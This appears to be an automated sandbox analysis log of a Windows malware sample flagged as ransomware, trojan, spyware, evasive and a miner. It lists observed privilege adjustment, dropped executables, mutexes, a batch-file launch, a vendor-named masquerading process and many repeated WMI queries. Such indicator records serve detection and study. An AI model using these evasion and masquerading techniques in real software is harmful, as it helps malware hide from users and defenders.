Source: classification engine

Classification label: mal100.rans.troj.spyw.evad.mine.winEXE@118/196@0/13

Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	Code function: 12_2_00B5AC74 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,		12_2_00B5AC74
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	Code function: 12_2_00B61D04 GetCurrentProcess,CloseHandle,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,GetLastError,CloseHandle,		12_2_00B61D04

Source: C:\Users\user\AppData\Local\Temp\main\7z.exe

Code function: 12_2_00B5ABB0 GetModuleHandleW,GetProcAddress,GetDiskFreeSpaceW,

12_2_00B5ABB0

Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe

File created: C:\Program Files\Google\Chrome\Extensions

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\L2D128LW

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\SyncRootManager
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8116:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6760:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4220:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6760:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exe	Mutant created: \Sessions\1\BaseNamedObjects\a091ec0a6e22276a96a99c1d34ef679c
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1092:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8244:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2912:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8116:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4220:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9208:304:WilStaging_02
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9208:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3536:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8244:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3536:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2912:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1092:120:WilError_03

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Temp\abc3bc1985

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1013561001\C1J7SVw.exe

Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S"

Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe	Process created: C:\Windows\explorer.exe
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe	Process created: C:\Windows\explorer.exe

Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9176
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9176
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3240
